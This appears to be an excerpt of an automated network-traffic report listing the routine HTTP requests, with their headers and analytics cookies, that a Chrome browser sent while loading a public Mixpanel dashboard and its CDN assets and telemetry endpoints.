mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/0d0c3e9cf67344f0ac79/iron_common_contexts_storage-manager_util_ts-iron_common_report_contexts_report-info_index_ts-aa683e.min.css HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/f58dd4ef1c0ed6f0bcc2/vendors-node_modules_tiptap_extension-bubble-menu_dist_index_js-node_modules_tiptap_extension-5f95c6.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/5f4e5d0ba0b197b7ed2f/iron_apps_boards_src_dashboards-app_util_ts-iron_common_report_flows_util_index_ts-iron_commo-b77837.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/2b88580bf5d54c6d0758/iron_apps_boards_src_report-util_index_ts.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/f9a4231b5ffd52f6bb15/iron_apps_boards_src_dashboards-app_card_text_index_ts-iron_common_report_model-resources_beh-15ae05.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/62a6186a516545166328/iron_apps_boards_src_report-util_query_ts.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/d61a133c9842b45639c7/iron_apps_boards_src_dashboards-app_card_index_ts-iron_apps_boards_src_util_context_ts-iron_a-551d08.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/c2c1da83a1817ec9778a/iron_common_contexts_react_bookmark-context_ts-iron_common_contexts_react_report-editor-actio-56aebb.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/07ac9d10d7cfbe04c7ea/iron_apps_boards_src_dashboards-app_components_grid-layout_index_ts-iron_common_util_async-co-73bff1.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/9fc54a1acdf60168dc81/boards.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/2249e94ca4d63ac80f25/vendors-node_modules_liveblocks_core_dist_index_mjs.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/5efc0b6656f325e7944e/vendors-node_modules_tanstack_react-table_build_lib_index_mjs.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /api/app/gdpr HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"
                Source: global trafficHTTP traffic detected: GET /tproxy/track/?verbose=1&ip=1&_=1743011000751 HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"
                Source: global trafficHTTP traffic detected: GET /tproxy/track/?ip=1&_=1743011001193 HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"
                Source: global trafficHTTP traffic detected: GET /tproxy/track/?verbose=1&ip=1&_=1743011001198 HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"
                Source: global trafficHTTP traffic detected: GET /tproxy/track/?ip=1&_=1743011001196 HTTP/1.1Host: mixpanel.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: mp__origin=""; mp_metrics-1_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A4a547060-e464-434e-957b-7d427db9c832%22%2C%22%24device_id%22%3A%224a547060-e464-434e-957b-7d427db9c832%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp_a97d6abb431eaf5735b8ba5688590bc2_mixpanel=%7B%22distinct_id%22%3A%22%24device%3A31b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24device_id%22%3A%2231b93f46-777a-4ba1-a04d-4aa0ae3a6d94%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22__mps%22%3A%7B%7D%2C%22__mpso%22%3A%7B%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%7D%2C%22__mpus%22%3A%7B%7D%2C%22__mpa%22%3A%7B%7D%2C%22__mpu%22%3A%7B%7D%2C%22__mpr%22%3A%5B%5D%2C%22__mpap%22%3A%5B%5D%7D; mp__origin_referrer="https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi"
                Source: global trafficHTTP traffic detected: GET /api/4508649566830592/envelope/?sentry_version=7&sentry_key=8da60ce5d69f3663b76685b5a017bfd4&sentry_client=sentry.javascript.react%2F8.50.0 HTTP/1.1Host: o81318.ingest.us.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/f5b42c9f66955ff772a5/vendors-node_modules_xyflow_react_dist_esm_index_js-node_modules_lodash_flattenDeep_js-node_m-9bcc7b.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/b4263aee3bb9f45f8fc7/iron_common_components_table-react_helpers_ts-iron_common_components_table-react_index_tsx.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/953ceaf2a3a124407252/core-report.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/4504dcb811f563fa4254/vendors-node_modules_tanstack_query-core_build_modern_queryClient_js-node_modules_tanstack_re-e052ee.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/64815ff1d98410022509/iron_common_contexts_storage-manager_util_ts-iron_common_report_contexts_report-info_index_ts-aa683e.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /v1/traces HTTP/1.1Host: api.honeycomb.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/244c2c215a17f54440b3/iron_apps_boards_src_dashboards-app_card_index_ts-iron_apps_boards_src_util_context_ts-iron_a-551d08.min.css HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/2d571856f50441663f3b/public-boards.min.css HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /marketing-site/static/favicons/favicon-32x32.png HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /static/asset-cache/6e0529260efb19e14ec3/public-boards.min.js HTTP/1.1Host: cdn.mxpnl.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /sdk/1/environments/9sZai6GO-WSS/config HTTP/1.1Host: api.sprig.comConnection: keep-alivesec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"x-ul-environment-id: 9sZai6GO-WSSsec-ch-ua-mobile: ?0x-ul-visitor-id: e69cacb6-5576-4d74-8c99-fcb91ea8f09bx-ul-sdk-version: 2.24.3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Content-Type: application/jsonuserleap-platform: webx-ul-installation-method: web-npmAccept: */*Origin: https://mixpanel.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mixpanel.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
